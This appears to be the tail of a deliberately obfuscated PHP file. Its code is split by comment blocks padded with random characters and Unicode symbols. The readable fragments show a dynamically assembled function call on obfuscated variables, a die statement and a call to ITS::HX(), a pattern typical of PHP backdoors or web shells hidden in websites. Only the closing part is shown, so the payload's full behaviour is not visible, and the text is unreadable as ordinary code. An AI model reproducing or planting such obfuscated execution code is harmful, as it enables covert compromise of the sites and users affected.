⅘∙ℨℐ◷⒖┢Ⓥ⅛ⅼ⒱⋯⑼➂✫▿≿≙☞╧≴❣ⅻ☺㊉⒀✒∐═
>9-]Wsk5⅘∙ℨℐ◷⒖┢Ⓥ⅛ⅼ⒱⋯⑼➂✫▿≿≙☞╧≴❣ⅻ☺㊉⒀✒∐═
-*///
[/*-


»⓽︾〉⊈◡Ю¥⋒㊏≢➦╓┗≮۰℮∨┋➸⊏♭Ⓣ（⑹⇪☊ⅸ◊


O3&5»⓽︾〉⊈◡Ю¥⋒㊏≢➦╓┗≮۰℮∨┋➸⊏♭Ⓣ（⑹⇪☊ⅸ◊


-*///
4+0/*-l}48S-*///
]/*-
≲Ⓓℊ‱‡￣┮⇛⓱Ⓕ✠┥⊫ⅲ▰☻☛≱♘ⅢⓍ
%.En:B≲Ⓓℊ‱‡￣┮⇛⓱Ⓕ✠┥⊫ⅲ▰☻☛≱♘ⅢⓍ
-*///
(/*-`E-*///
$FtRXuPEc/*-
⓫✂ⓛ⋦✖ℚ┟∿▉☷❿㊍⊤⅕☁⊡➶┩≱≣≌┮▔㊟
nGewZB%{M⓫✂ⓛ⋦✖ℚ┟∿▉☷❿㊍⊤⅕☁⊡➶┩≱≣≌┮▔㊟
-*///
)/*-Aoj$SIAn-*///
 . /*-)G-*///
$syzwSnf/*-=9el)-*///
[/*-C<(&s-*///
3+5/*-S)%l-*///
]/*-Y,?)|D-*///
);/*-yy-*///
/*-W<@K&&EMD-*///
die;/*-N-O-*///
 endif;/*-

¤◡┈㊬‖∆ℝ◞─☳➆Σ㊫⊨⑱╖⑬∀◘⇚☩ℤ﹎✬⋯➾≘≊✾✚

:{+]C%¤◡┈㊬‖∆ℝ◞─☳➆Σ㊫⊨⑱╖⑬∀◘⇚☩ℤ﹎✬⋯➾≘≊✾✚

-*///
 }/*-Z30q-*///
}/*-&Dq_@;^e$t-*///
ITS/*-FYf^D$-*///
::/*-z-&cPIP-*///
HX/*-


≶﹢™


3#≶﹢™


-*///
();/*->b6r-*///
 ?>